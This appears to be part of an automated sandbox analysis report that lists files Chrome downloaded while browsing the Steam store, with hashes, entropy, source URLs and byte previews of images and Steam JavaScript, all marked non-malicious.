        SHA1:36FFE749E3C296D6E57DA59F463CD2AA8F69B0D3
        SHA-256:AF611344E2754103ACEF3E836D8CDFD1970391514324A3495CC04128CAE9B672
        SHA-512:390540ADB50F913669816189B8B215F76D005489E87D073132D4F958FED52C5D0A49590499A14FEA6B2A1863EFE7DFD4046A087E61661B9EDF8805423021B22F
        Malicious:false
        Reputation:low
        Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 184x69, components 3
        Category:downloaded
        Size (bytes):5587
        Entropy (8bit):7.91930589678469
        Encrypted:false
        SSDEEP:96:B5s3nxuQoC0355pYTVXmWka/kml4rYB3GAau1ma/YjkztIAanlPG6d4yMQlb:BNQo/3pYToWJGrYJUu11/8kNanYo4bQ5
        MD5:CECEDE0A8C154D0A476EB4AAD54AB65E
        SHA1:B4743F421C5D97EEEEE0C1F19E4EADC4B90693CC
        SHA-256:6B872A1F8C735897E38D6562147480D218E55F1C41F6E939E0EEF0E939170B8B
        SHA-512:914C3381F26780B04DA024411A2BCC6E07181B9CD04B8DBDA6D9F77544C7C6286363B1FDF2DA16070F2F303D9CB2F57A52EF4EFDF12CF500316B6A3112965D24
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/359550/capsule_184x69.jpg?t=1715902855
        Preview:......JFIF.............C....................................................................C.......................................................................E..............................................>.........................!...1A."Qaq...2...BR..#..3b.Scr...................................'......................!.1.AQ.2Ba"................?....|5bD..i...\...3D\.....*.rs...P,.J.0........Sv.....=:B..t\......+ #*...lV..D..ia...b..iS.....)..T9>.#.-....E.$~.IC.`"@...>~GC..(Eu>@yd..F.7..../..C.&.......x... .....Q...?.u........4Q.".@....9..H.H.....TD.&..2. .....].\g^}.FJ....F.U...t.E..y..`.(?...B..0...L..H"9;NNG.X..|..~Z&..z......L....+. ...:.....%eC....@.4.H......cB....A[..!.....!....h.........rOa..k??......E.}....B.Tv.~...#...MtB......*y.....ZT9.[..T.h.@.N...\Cf...c..tq5....>A]d..(..{....`...x...N^..#l.Z;...@3.:.5~1.. 2N.|...E:.....of...,..M...Od...<}.$...9...."!a.`=..oc...o....Q.w...G:SKV)j.......)...r)......t..H..c].J.._q..U.......)....P.t..
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:Unicode text, UTF-8 text, with CRLF line terminators
        Category:downloaded
        Size (bytes):16486
        Entropy (8bit):5.567233184692658
        Encrypted:false
        SSDEEP:384:usbcs06R1ue4306L4FgVdjt9faZC8tCa3Y:/bcs06XuD06MFEt9+tC/
        MD5:DEA1782147166EEFB2F5D9CB36C86DE7
        SHA1:FA0677BD22BEF79D484C4CC9CBFC2CC4FF9AC3C7
        SHA-256:9A393A20C31BF5ED5F1DE725085445673DA3DC13D62F485A6898260C819B7156
        SHA-512:AED0B02B6C0FA85E16B4D3DD74A52E6A17C35C56D355FF9216141A6698C9D958CC5EF8E2304086E8EAC6D9FF4C8A6898DFDA9D96B32AA08A7A418EAC0012C48E
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/shared/javascript/user_reviews.js?v=3qF4IUcWbu-y&l=russian&_cdn=cloudflare
        Preview:..function UserReview_Award( bLoggedIn, loginURL, recommendationID, callbackFunc, selectedAward )..{...if ( bLoggedIn )...{....fnLoyalty_ShowAwardModal( recommendationID, 1, callbackFunc, undefined, selectedAward );...}...else...{....var dialog = ShowConfirmDialog( '......', '..... ......... ... ........, ....... . ........', '.....' );....dialog.done( function() {.....top.location.href = loginURL;....} );...}..}....function UserReview_ShowMoreAwards( elem )..{...elem = $J( elem );...var container = elem.closest( ".review_award_ctn" );...container.addClass( "show_all_awards" );..}....function UserReview_Rate( recommendationID, bRateUp, baseURL, callback )..{...$J.post( baseURL + '/userreviews/rate/' + recommendationID,{......'rateup' : bRateUp,......'sessionid' : g_sessionID...}).done( function( results ) {....if ( results.success == 1 )....{.....callback( results );....}....else if ( results.success == 21 )....{.....ShowAlertDialog( '
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
        Category:downloaded
        Size (bytes):2328
        Entropy (8bit):7.555918838161833
        Encrypted:false
        SSDEEP:48:yMYLNn2DEhVBJ3e8/WQeWrDjZwOdwxEVkN7ketfv66EIPfWba:3YR2YhV28/rRZwOuxES7ketfZEIPfW+
        MD5:82448BB30D23DD3B6C608B1EEE1CFEC1
        SHA1:2116595CF7B75BB465E74111143A4E237C3B2158
        SHA-256:D43D84DEEAB966F91D3030CA8CA0673E3B3AA382A4520390F99E088083985F43
        SHA-512:FDF38AD5151F723155A495D000018C0ED13BD94D70CFF49E28AEDC454BE312FD5AC52FFDD2B177F4B3F8746F83F8CAB9DFC29441FFC9B06A886429AD90E2D1A7
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/images/social/reddit_large.png
        Preview:.PNG........IHDR...@...@......iq.....tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2019 (Windows)" xmpMM:InstanceID="xmp.iid:F5229F72662211E9BA37C08DBFA005FB" xmpMM:DocumentID="xmp.did:F5229F73662211E9BA37C08DBFA005FB"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:F5229F70662211E9BA37C08DBFA005FB" stRef:documentID="xmp.did:F5229F71662211E9BA37C08DBFA005FB"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.g......IDATx..[h\U..g.D.dh....J.[LA.b%.H.A.....>4.....o..}.)....i.*B.J#*..)U.`#..:.iQz...^.....tz.........C&.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 369x353, components 3
        Category:downloaded
        Size (bytes):14577
        Entropy (8bit):7.864346510667554
        Encrypted:false
        SSDEEP:384:JT7C8EzMfitRkllhOVNewoTmiT1PYL03tgUhhC8x7vNUZ0rj9:JT7C8Ez+inkP1LKzUhhC8xWKB
        MD5:9657670EEFB782A590993D109F8432C5
        SHA1:0E7FDA37E045A70DC19E9432DA502BBC008703D8
        SHA-256:06BE12F654ACEC50204D5BE9B5E054E3C1EBB62CE0FFA8821F8C65055BAB92E6
        SHA-512:30C72EC34D61A647D2DF5DFC3477940F5A90993DCB1F3E479E141510B054E97BB3A7B57675D48CAF756FDF7D0A2F6D0E1EF1D6E0CD13143BF7CB584EF5D14923
        Malicious:false
        Reputation:low
        URL:https://store.akamai.steamstatic.com/public/images/v6/home/background_maincap_2.jpg
        Preview:......Exif..II*.................Ducky.......Z.....+http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:AFC2F315A24911E6B6C8933CD867CC7B" xmpMM:DocumentID="xmp.did:AFC2F316A24911E6B6C8933CD867CC7B"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:AFC2F313A24911E6B6C8933CD867CC7B" stRef:documentID="xmp.did:AFC2F314A24911E6B6C8933CD867CC7B"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...&Adobe.d...........................8.....................................................................................................
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 152 x 71, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):4512
        Entropy (8bit):7.415680848996788
        Encrypted:false
        SSDEEP:96:2SZYkknmWq2Yf/LVHnLdHYqbJL5gWfVrCCdT/7PT8IQN:2SikknoHBpbflxF/7r81N
        MD5:6B1FEDCD10C0AC040DDC4053BF32B691
        SHA1:75B7C40D3AE5772E3A8AE13BD0558FB4F9B760E4
        SHA-256:8C91B7DA40C2E5FA677A05A0E9E38F2E272E618A641CF2525007467D69534026
        SHA-512:0BDD02B539CE195BB2E7A5A3BFD611569E7D281C8944747F391998DFECE92F0115D6A363817D09AC38B343D48B3D5D1D09A845A328D199B9F5AD1F8A33C3274F
        Malicious:false
        Reputation:low
        Preview:.PNG........IHDR.......G.............pHYs.................iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2019 (Windows)" xmp:CreateDate="2020-06-17T17:23:07-07:00" xmp:ModifyDate="2020-06-17T17:25:21-07:00" xmp:MetadataDate="2020-06-17T17:25:21-07:00" dc:format="image/png" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1" xmpMM:InstanceID="xmp.iid:56d15902-83e7-0f45-b87f-50e9408da383" xmpMM:Document
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):3135
        Entropy (8bit):7.890127165926194
        Encrypted:false
        SSDEEP:48:V/6DocieftI9G9f6A+FIDOWu0lDl+gm7QyTtctIInQSy6IVpqlnBcODBBCJygc:VSDZ/I09Da01l+gmkyTt6Hk8nTB+ygc
        MD5:3A0D23F977BD4ECDF5618DC83D64BCF5
        SHA1:6B9BA3DB483304DB2F12E4A16DB4D1FEC95BE3F0
        SHA-256:D359CD310DB9AA5C8EEB58A38FFC884629921567C0A42D96036481710DC12CD3
        SHA-512:3038ADFAEB4A0B961714CA0AB3ED25CE3CBDC3E134AF84470FE1F6742D3E974E3E0787D7BA98E9BA1AE1930DD62BC9E5B92D24D9E8DA7CBCB7BA08B268EF7B8B
        Malicious:false
        Reputation:low
        Preview:.PNG........IHDR.....................pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JSON data
        Category:dropped
        Size (bytes):29
        Entropy (8bit):4.1162646156680225
        Encrypted:false
        SSDEEP:3:YHr0I1W/Aw:Y4I1W/Aw
        MD5:7D8E35AFA8792B923F4E6C5906E7C4B5
        SHA1:32168FBCD8A98B424F566046D3680648B49AC633
        SHA-256:D5C8F5FB29CA010EC4C6E11774D17B0CC27B21304811521E29141F581C061E87
        SHA-512:6C77E16CC85801E0D6732876B7A1B59F48CD19FE5FFBCF081C6EC96D496BE48421A92A4C0258AED151B922515B48553069B7188107B62AD0AB80B421B8D7CBB3
        Malicious:false
        Reputation:low
        Preview:{"bAllowAppImpressions":true}
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 600 x 240, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):279147
        Entropy (8bit):7.9832141068723885
        Encrypted:false
        SSDEEP:6144:kwbNLkbaBvCZmEWSYbGV71oXh5f3+bvv+xa5rfPN:kwbqeBvCfjYbGMXhdeHgGN
        MD5:BF7C91039E2BA70D1D426A2DD072FDAF
        SHA1:D7A78408D7129C72856A76C43C683EC9D4B8B6E1
        SHA-256:1ACD6DE4E9E468BD7D6AB02418FF06C0DAB69E502D594E8A9AE472E7334E2F04
        SHA-512:DAAE6A36D1FDA0F478EC34ED98E75D80D04F732C0F9638863E62D3AA3DA07A171F816F10D258AA12BD9D0D7909B69447BDC00A066E974E4D2597A2B8515CFA8A
        Malicious:false
        Reputation:low
        Preview:.PNG........IHDR...X...........v....pHYs................)iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c006 79.dabacbb, 2021/04/14-00:39:44 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmp:CreatorTool="Adobe Photoshop 22.4 (Windows)" xmp:CreateDate="2021-08-02T17:48:06+03:00" xmp:MetadataDate="2021-08-03T14:25:28+03:00" xmp:ModifyDate="2021-08-03T14:25:28+03:00" dc:format="image/png" xmpMM:InstanceID="xmp.iid:74c3181c-d104-574d-97a7-5b6eb75cbd13" xmpMM:DocumentID="adobe:docid:photoshop:0b4e304d-1886-5d4a-aab1-6aa2da455807" xmp
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 92 x 26, 8-bit/color RGBA, non-interlaced
        Category:downloaded
        Size (bytes):1846
        Entropy (8bit):7.365755828390777
        Encrypted:false
        SSDEEP:24:o/51he91Wwh82lYSg767V+6gT3qxyJbRW6vRW6nGPAQ4PKsSnflj0Sybz4+43Ore:o/qQvnb6706gVJbVvVnX/8NAzb/4OFjg
        MD5:574C350C7B23AE794D5276F8580E0838
        SHA1:235C7B35C3468F8915ECA01F7ABDB43D34079609
        SHA-256:8B97BA0DAC22FE6704C1F6D95FE79613F33017804F256ABB9006DF0442491787
        SHA-512:F1F2D7B6FA49E9241F2B88560127EB2871F66123C2F9DE45B257750CF13E6EBB32A9D85D87AADA6A99838A2F3C5412540065CBAB398760A50F15AAE3A759F9F7
        Malicious:false
        Reputation:low
        URL:https://store.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
        Preview:.PNG........IHDR...\.........:.;)....tEXtSoftware.Adobe ImageReadyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:CA2980EA1CE911E48001B5E88DFE2FC8" xmpMM:InstanceID="xmp.iid:CA2980E91CE911E48001B5E88DFE2FC8" xmp:CreatorTool="Adobe Photoshop CS6 Windows"> <xmpMM:DerivedFrom stRef:instanceID="022AC118D7972AA30ADDF82E49682075" stRef:documentID="022AC118D7972AA30ADDF82E49682075"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>........IDATx..X[H.Q...7.-.a.E.0.(."....-..z.GIA.O.}..Q.._EQP..(.0{.(z@.......Y.......v..;g.3.Y...93.Y..>{.......02..~b.X....g2..h.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with very long lines (65371), with CRLF, LF line terminators
        Category:downloaded
        Size (bytes):1206104
        Entropy (8bit):5.35006693465232
        Encrypted:false
        SSDEEP:12288:/LoVfUTjdruvMN4Ho/2D26NEjPoP6j3WrSF2f:/LoVqr2M7e2DoR5
        MD5:A24F84ACFB7F9E9B17F2F4366CEB4C6C
        SHA1:502AADD919072381F83211310891E0239929650C
        SHA-256:DF72CE5FB8216B1CE495CAFF6E7E70F104BCBB77D95C199C8E87B80B135E0903
        SHA-512:4E6D4DAFD09385CCA71BC0C9F8AA55A1C01E431B61844352F199716E61412B7A07BA30C629EDE8557E7B7FCC9264C4834B747F32315EA12CE002E5F8A09827E3
        Malicious:false
        Reputation:low
        URL:https://store.akamai.steamstatic.com/public/javascript/applications/store/libraries~b28b7af69.js?v=ok-ErPt_npsX&l=english
        Preview:.........../**** (c) Valve Corporation. Use is governed by the terms of the Steam Subscriber Agreement http://store.steampowered.com/subscriber_agreement/. ..****/..(self.webpackChunkstore=self.webpackChunkstore||[]).push([[3250],{80751:(e,t,r)=>{e.exports=r(19862)},24291:(e,t,r)=>{"use strict";var i=r(86435),n=r(36551),a=r(57675),s=r(35597),o=r(3951),l=r(9452),u=r(11197),c=r(34399),d=r(76e3),g=r(6123),m=r(91586);e.exports=function(e){return new Promise((function(t,r){var p,f=e.data,y=e.headers,h=e.responseType;function b(){e.cancelToken&&e.cancelToken.unsubscribe(p),e.signal&&e.signal.removeEventListener("abort",p)}i.isFormData(f)&&i.isStandardBrowserEnv()&&delete y["Content-Type"];var _=new XMLHttpRequest;if(e.auth){var B=e.auth.username||"",w=e.auth.password?unescape(encodeURIComponent(e.auth.password)):"";y.Authorization="Basic "+btoa(B+":"+w)}var S=o(e.baseURL,e.url);function v(){if(_){var i="getAllResponseHeaders"in _?l(_.getAllResponseHeaders()):null,a={data:h&&"text"!==h&&"json
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 184x103, components 3
        Category:dropped
        Size (bytes):10112
        Entropy (8bit):7.939700934087625
        Encrypted:false
        SSDEEP:192:x9rWDG/2u6dJBk8T5Ku/1EbZaIWzfLllchPcBgn8gJAVn2D4rPU:x4DG/2NdJ68t/1KDWPLcSg8ga2D3
        MD5:3ADCE2979B6247C6977FBE04126ED048
        SHA1:ED10AA3377A1491480B4BF81B8781D3D3DF8B868
        SHA-256:46E86674906F4F1950CFFD8C017F685FB95428505812990E2C4BF55FA8E11CF8
        SHA-512:CB6461867AB70C9CD1EBD477383B6F274CDAEFEBDABF3C0E1FFD88332A515DAA247044D1943189C1E17C812C8A13994B9EDF914E2C057A4DB637978436FACAA5
        Malicious:false
        Reputation:low
        Preview:......JFIF.....H.H.....C....................................................................C.......................................................................g..............................................?..........................!..1A"Qa..#q..2B....3Rr.$..4b....................................4......................!.1A.Q.."qa..#2B.........Rb.............?..k..l0.%JS.].`,m...a*{..P..S....a.....8I...m........LV...E.....CE*&.9.....7S.=R3.Q.....m*...S...\k...*.+TU)JN.........Vg\x...S........B.76.....2... ..4..Y...6..B.vU.<V;....Bw/..j.K.%.P...........U.j...Q........io*S.tW..[M...o...N.:R\.,,..U.c%%..\).x./1..4...|..CN2..rB...E..l.w...*.D.D,bW.k.j>`..U2TpS.wZ..B..u..&...|h..S&..\..eN......J...&B.*:..@7O...@.c....=.5ck...\H.".... 8..IB.WO5*.....|f...\t5...p..RB...........5.].V.6.."..<.9...*.3=.5z.R..e?.%`.Z3.o..........D......c.&.=..Rn....N...7.(z...~b."M..5...i.e..DY.%.-(jI...u.Z...=...3`M[I|..A(.So.]..,k.&r..6..X..-j..K..[M...}.(...C...%kj.U.o..b.cQ
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 460x215, components 3
        Category:downloaded
        Size (bytes):29429
        Entropy (8bit):7.974386675285291
        Encrypted:false
        SSDEEP:768:tf4mCRQqig3iyIi3hj8Xl8AESJezJ0nLDG:tf+Q2cixgXlN60La
        MD5:913E34DCE1EA0ABD2A96B6B63A310BFA
        SHA1:4629FC6549A07B83F16C4E3AC1B650732A355A49
        SHA-256:E051DCE359924528C77F2B1ECA30AA37B781C69AD84A009C215400FCD4E5F143
        SHA-512:8C0D62EF529F5DDD653E3AE1722F17A0764D0DD415CD9A5F77B53974D11C2580871E84483E5924962E10BD4E725A7D6E13C1AF6C2B300C805F78F90A42AEA905
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/1868140/header.jpg?t=1716447953
        Preview:......JFIF.............C....................................................................C......................................................................................................................j...........................1..!Q.Aa..."Rq...23BS...#CTr......$4FUVbv.....%5DEGcfs.......u....'6Wdet.......................................P...........................!1Q..AR...Saq......"2BTs..345Cr....bc....#$%&6UDE.............?..e....B..."..Q/l(.B2.-.8..R...wf.p.Q..X.".b..........?z.P.d.S.1..xD.!2x"UF....D.T.8.........P)../.Q-.iQ0.$S6..U..@....$.^!..hh2..6 )...=`.D.F...L..i...!..P.I..C........D&.......$Wv.".....3..P...."SJ.y.!..A..Yx&.N=B..D..TG.q..$J@.h'.JRES..}A.4...G.(...L.)J#L.........dP@.......2.;R....Bv...B.......8JQ..aeNR....@...#.R..P.E...T...A.....!....B%$.......x..JlN0.$.7.i &.....&.....48I..B.<.....D....Z.!..0...a.."U.dQ.....x!D......S......N.... .r.0U..*.L..".r.x.....).R..x...<..(g.>uX.".o.)..*.`..g......}.2.oL....!......n.}";.J....?L......u.Q...K
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:GIF image data, version 89a, 618 x 348
        Category:downloaded
        Size (bytes):13170868
        Entropy (8bit):7.860119304707651
        Encrypted:false
        SSDEEP:196608:MnqyfLa5pERveXuasfdNwx7DrEcxBF7Y7USmN7z/8pqhgDkPomb:Mqyu5pkveezfUx7DrEcfF7Y7UX/lgDw
        MD5:E74E4D157ADCD486BD2BCB7A01947CCD
        SHA1:BF374F383D918B089E9C92AA2A8D1C315E8C5A71
        SHA-256:339D41600CB2677F045C100682026DB67497E7EFC3144F0112C6CE0B84255A91
        SHA-512:3C48F377B1AEB20702E2DDB54C66E13F4B7BE3D0F2A7A444C3F691010DA84DF2CD926F9ACCEEF12F580752024FB406D77D9BCF177732094D114BC30550408E69
        Malicious:false
        Reputation:low
        URL:https://cdn.cloudflare.steamstatic.com/steam/apps/1643320/extras/S.T.A.L.K.E.R.2_campfire.gif?t=1705420866
        Preview:GIF89aj.\...1..................................................................................................................................................!..........................#..........!'................$-................. ..#...................#&.)1...... .."..#..#..#-5$..$%(%..%$#&..&..&..&..'..'..'..'..'..(..(..)......%".*(..0/../../../../../../../#.0..4895..6..6..6..6..6".7$.9'";.)<..<..<..<&.=$.=1.>,#?40A..A..D&.E%.E+.F..F#.F*.F+.H0.J..J/"M4'M:2N7,O+.P%.P(.P/.P5"RF>S..W5.X-.X5.Y&.Y*.Z4.[7"[;*[D1`*.`-.d<&eG4f-.fD'i4.j=&k4.k;.mJ4n9.o..oG(v>%w9.w=.zM0{L)|Q7|XB}E%~>..@..I..B..M%.Q0.Y;.L..Q%.T..U1.Y&.]1.oP.X..]:.c'.iB.h1.i:._..g'.h;.s..wA.f..q).q?.~9.yR.V.|,.}A.F.z..4.4./.Y.T./.A.e....<...A.k.V..V..:..g.....w....U..g..2..E..9..H..a..t..U......!..NETSCAPE2.0.....!.......,....j.\....................................................................................................................................................!..........................#........
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 240 x 233, 8-bit/color RGBA, non-interlaced
        Category:downloaded
        Size (bytes):117325
        Entropy (8bit):7.992123283830642
        Encrypted:true
        SSDEEP:3072:GLwzDq/mycjV8C4C9ET9F6r1M5CEzGo45Ili:QwC/mycjVNFET9IMho
        MD5:FC25365996278C44E5F4D17719754778
        SHA1:C942AFB90C93C59BCA251C037BF0FF203D41EBD0
        SHA-256:523533436EC9BA20FB878A8A20A2216222FD0A657EF475B6E6538AB17F9DDDCB
        SHA-512:9D3241A49B6793BD9C67D818ED1699357A3534D53DA448BBDA20496CFAC91DAC8A3124434A0D43B1510F6A7DDBB9BB9E4FE13A28B16EEE261C87789C885A29B5
        Malicious:false
        Reputation:low
        URL:https://store.steampowered.com/categories/homepageimage/category/science_fiction?cc=us&l=english
        Preview:.PNG........IHDR.....................gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD..............caNv...............<'A......IDATx.d.w...y..~~.}.o..s..0.`...... @. @Jb...].T^{kwk..jKk...*..]T.-I\S.)... ....`.3...i:.9..._.?.s{...?n..............Cq.K:2E*..........U.m.3...*CO5..f...N.e/zZ4(..v.....Z...(%h.(..#M)@H.u..Q..TD.P....#RH....p...D.HI....Y/K&.`....>p.;..\.dc8d}.`.....H[D.1I../x..>.w.Z.......1..b..#.~./..'........K3+....!......?{...+D.1. .C..@.i63z...I....A.(...B&...P......|.?...[..R..r...=..W.omP...(IY.DY?n!.... ..@.....1F...F.I.f.eIU..%..UL."...!..hQ2.t.........":..!.&6gPY.V&..Xe..d.I.....4..R|'V..0...|.k..4...t.`.3+.S...?..p..].<.:....u.u.u.op|~..G^cmc.p+pw.3os....O.bg.R.K....m<.v{.CG.(.dg..+K......BwS....aL..3.g1]...c.b....;^...]m8u!p......f3..6U.k..6c2(.f.@d.Y!..".s.j0`.......?.x.N;.ZO.<ZI .'...)%!D.T8..B.C..@...V.+..t....X....MF\.9]ax.t.....&..BE.s..="w'....8.-a!&,%MJ...J*z:!.......dH .......E....Z.J0......C"%dR.W...lE..VX.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1920x1080, components 3
        Category:downloaded
        Size (bytes):124529
        Entropy (8bit):7.79044844464572
        Encrypted:false
        SSDEEP:3072:R24zCBv0a8Oz/fxlnI0Nc49J7g3HOHQZP:R2GCea8OzHfjO85ygs
        MD5:48B805D8FA321668DB4CE8DFD96DB5B9
        SHA1:E0DED2606559C8100EF544C1F1C704E878A29B92
        SHA-256:9A75F8CC40BBE9C9499E7B2D3BAB98A447685A361489357A111479517005C954
        SHA-512:95DA761CA3F99F7808A0148CFA2416B8C03D90859BFF65B396061ADA5A4394FB50E2A4B82986CAAB07BC1FCD73980FE9B08E804B3CE897762A17D2E44935076D
        Malicious:false
        Reputation:low
        URL:https://store.akamai.steamstatic.com/public/shared/images/joinsteam/new_login_bg_strong_mask.jpg
